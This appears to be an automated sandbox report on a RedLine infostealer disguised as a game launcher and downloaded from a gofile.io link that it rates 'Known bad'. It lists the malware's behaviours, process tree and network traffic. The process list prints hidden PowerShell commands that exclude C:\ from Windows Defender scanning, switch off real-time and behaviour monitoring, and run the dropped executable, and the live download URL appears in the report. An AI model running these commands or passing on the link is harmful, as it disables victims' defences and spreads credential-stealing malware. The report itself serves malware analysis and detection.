Analysis Overview
Threat Level: Known bad
The file http://gofile.io/d/NxfCv2 was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Modifies registry class
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-12 21:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-12 21:01
Reported
2024-07-12 21:06
Platform
win10v2004-20240709-en
Max time kernel
252s
Max time network
263s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2660 set thread context of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4512 set thread context of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gofile.io/d/NxfCv2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a5b46f8,0x7ff99a5b4708,0x7ff99a5b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Launcher v4.2\" -spe -an -ai#7zMap10348:88:7zEvent17570
C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe
"C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe"
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe
"C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720818300712.exe"'}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720818300712.exe
C:\Users\Admin\AppData\Local\Temp\1720818300712.exe
"C:\Users\Admin\AppData\Local\Temp\1720818300712.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1720818300712.exe
"C:\Users\Admin\AppData\Local\Temp\1720818300712.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 151.80.29.83:80 | gofile.io | tcp |
| FR | 151.80.29.83:80 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| GB | 95.101.143.219:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.200.46:80 | google.com | tcp |
| GB | 142.250.200.46:80 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:80 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | support.google.com | udp |
| US | 8.8.8.8:53 | 219.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 172.217.16.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | lh5.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh5.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh5.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.213.14:443 | www.youtube.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 22.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.102:443 | static.doubleclick.net | tcp |
| GB | 142.250.179.234:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.179.234:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| GB | 142.250.200.35:443 | id.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.111.133:443 | repository-images.githubusercontent.com | tcp |
